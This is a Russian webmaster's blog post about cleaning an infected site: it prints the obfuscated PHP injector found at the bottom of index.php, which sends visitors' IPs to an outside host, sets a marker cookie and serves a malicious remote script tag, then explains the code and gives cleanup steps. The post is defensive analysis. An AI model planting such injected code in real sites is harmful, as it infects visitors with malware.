Попросили не так давно посмотреть сайт, помеченный яндексом как опасный, на котором после тегов выводился зловредный код на js

<script src="http://feelthesame.changeip.name/rsize.js"></script>

найти и удалить который удалось лишь после некоторых изысканий и разбора кода самого движка, который видел в первый раз. Все дело оказалось в врезке постороннего кода в файл index.php находящегося в корне сайта.

function sql2_safe($in) {
$rtn = base64_decode($in);
return $rtn;
}

function collectnewss() {
if (!isset($_COOKIE["iJijkdaMnerys"])) {
$value = 'yadeor';
$ip = $_SERVER['REMOTE_ADDR'];
$get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
$content = @file_get_contents($get);
@setcookie("iJijkdaMnerys", $value, time()+3600*24);
if (!$content)
echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9mZWVsdGhlc2FtZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=");
else 
echo $content;
}
}

collectnewss ();

Если воспользоваться вышеупомянутой функцией и посмотреть что же делает этот код, мы увидим, что идет проверка на наличие кукисов (cookie) «yadeor» в браузере, если таковых нет, то идет запрос на http://xxxporno.xxuz.com:888/move.php?ip=ВАШ IP с которого судя по всему качается вирус и после этого ставится кукис (cookie) «yadeor» (вроде помечает вас как уже зараженных) вместе с этим в коде сайта выводится js код, который антивирусы распознают как опасный.

<script src="http://feelthesame.changeip.name/rsize.js"></script>

Лечится, довольно просто если знать, что искать. Этот код полностью следует удалить из файлов где он есть. Чаще всего это файлы в корне сайта с названиями index.php и main.php в самом низу которого и размещается этот код. Первым делом, после обнаружения факта заражения, необходимо сменить пароли на FTP, удалить сохраненные пароли из установленных FTP клиентов. Я уже как то раз писал про это, но все бесплатные клиенты и те что валяются в взломанном виде, уязвимы для такого рода заражений и ни один антивирус тут не в состоянии помочь. Заражение происходит моментально. А если вы еще и храните пароли сохраненными в самом клиенте, то ждите повторения истории. Уж лучше хранить в текстовом файле рядом с ярлыком, нежели в самом клиенте. Далее вам следует поискать в папках сайта, все измененные в недавнем времени файлы и проверить их на наличие лишних врезок кода. Всякие лечилки на php как правило не находят этот случай или не диагностируют правильно, так что без ручного вмешательства вылечить сложновато.

Надеюсь вам пригодится данная заметка.